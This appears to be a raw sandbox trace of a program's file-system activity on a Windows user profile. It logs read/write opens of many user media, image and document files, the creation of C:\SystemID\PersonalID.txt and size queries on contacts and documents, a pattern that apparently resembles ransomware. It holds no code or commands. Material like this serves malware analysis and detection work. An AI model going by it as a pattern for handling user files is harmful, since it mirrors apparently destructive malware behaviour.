Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\8goXTx lf4qln.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\9UqmwCjaFzvC9hxQ_Hzm.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\aqCrbf.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\BH6aDwcoogn.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\E5BUqHk2HLgOe.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\iD-nB 21AVlDXuyQt.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\jqJvbR_QvwlZ.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\L9aKE_qa0wpEDQP.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\ML2ljwZwYxgt.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\oaN8Ym.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\P r09cK6te2.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\T4bMO1.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\twx8so6utmD0rym.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\yYv0O.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\DWu1l-Y.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\jTQEcsS48yYmNAYPg-C.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\oi_ITTR8-wThmdlbwB.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Oy-L7Z_7HHJqNjbRbhn.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Tkrayns.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Wq-pSl9brlP45GOmX.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\XOHwMSl dhcUZR2jE3dY.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\YzSNWGeNkq7FltH72B.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\5l6On7s_t7GucX53.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\60yrjxUg Vj9.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\gwGJ_.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HAIVHenLu6VmrRA9qdSL.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HsIk z MzQTD.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\Qwgdm9P2yFX8.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\ROFZyVd380HDxuGO Th.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\wg6gkYjub7md9I.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\zZtwi8cLkIz2TYu9.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\95A_eDslLCP1_cxOmp.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\a4C0Db hej9s3eMTL.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\AeGLUfnT 5mkX0jwT7I.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\blPbdb.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\FuG6Li hHaoR.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\OaWM3OsWAcMsAPmjtMp.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\sySoZPGd3WyY2p8FSZlL.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\V8Vbr5d9qBcwJea.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\zNCu.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\8yd_-EOXVhtdOvzi yYD.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\jiyYQcsk0aKO.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\U LJ9GkFn_ZZk5OYhw-.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\VOisP_2QkSl3ZoB7yjo.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\WaWTw-qe_8kdov2ReXE.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\wso4Uc9Jo_0.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\3LXSiPCs.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\arfQt1VvAj.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\mdD0aXVF0dK25EdF.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\NI9HSi svXDo.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\Wa jATnjlZIHpQ.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\0 hjFn64gP.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\5SOK8nzJPtO5w6tJww.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\dSMvKtmHiWH 1Bu.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\eLYk8XmS1.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\pXiB_A.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\y5xwn1F.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\YJEie6a3AkLk83C8Lu.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\zk2UII3QYbHa4.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\fQmlW2dWeShgkpqPW.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\HEQ_cwY6PJg1oZNA5e.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Directory	C:\SystemID	-	1	Fn
Get Info	C:\SystemID\PersonalID.txt	type = file_type	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	type = size, size_out = 1178	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	type = size, size_out = 68382	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	type = size, size_out = 1171	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	type = size, size_out = 1177	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	type = size, size_out = 1174	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	type = size, size_out = 1172	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf	type = size, size_out = 67106	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv	type = size, size_out = 6691	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3	type = size, size_out = 100108	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc	type = size, size_out = 20387	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods	type = size, size_out = 57817	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc	type = size, size_out = 93603	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png	type = size, size_out = 1790	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	type = size, size_out = 477184	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv	type = size, size_out = 64429	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf	type = size, size_out = 78697	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg	type = size, size_out = 9643	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif	type = size, size_out = 34531	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx	type = size, size_out = 52410	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3	type = size, size_out = 95802	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a	type = size, size_out = 45471	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods	type = size, size_out = 36093	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt	type = size, size_out = 85076	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv	type = size, size_out = 67275	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi	type = size, size_out = 18491	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png	type = size, size_out = 72754	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv	type = size, size_out = 3613	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv	type = size, size_out = 72026	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png	type = size, size_out = 46512	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv	type = size, size_out = 22056	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv	type = size, size_out = 70599	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv	type = size, size_out = 93295	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc	type = size, size_out = 41399	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx	type = size, size_out = 86297	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx	type = size, size_out = 9045	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx	type = size, size_out = 88542	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc	type = size, size_out = 36829	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx	type = size, size_out = 56042	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv	type = size, size_out = 93924	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx	type = size, size_out = 96642	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx	type = size, size_out = 36236	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx	type = size, size_out = 6513	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx	type = size, size_out = 1364	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx	type = size, size_out = 28638	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx	type = size, size_out = 33637	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx	type = size, size_out = 80409	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	type = size, size_out = 51967	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp	type = size, size_out = 75473	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx	type = size, size_out = 30444	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf	type = size, size_out = 45284	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx	type = size, size_out = 26773	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt	type = size, size_out = 88093	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps	type = size, size_out = 29761	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf	type = size, size_out = 16110	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf	type = size, size_out = 4020	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp	type = size, size_out = 19135	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx	type = size, size_out = 25296	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt	type = size, size_out = 40427	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx	type = size, size_out = 102170	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods	type = size, size_out = 32939	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf	type = size, size_out = 60124	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx	type = size, size_out = 25888	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx	type = size, size_out = 89898	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt	type = size, size_out = 73720	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf	type = size, size_out = 1498	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx	type = size, size_out = 45601	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt	type = size, size_out = 27154	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc	type = size, size_out = 48308	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx	type = size, size_out = 96578	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx	type = size, size_out = 52658	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc	type = size, size_out = 61274	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt	type = size, size_out = 42392	1	Fn
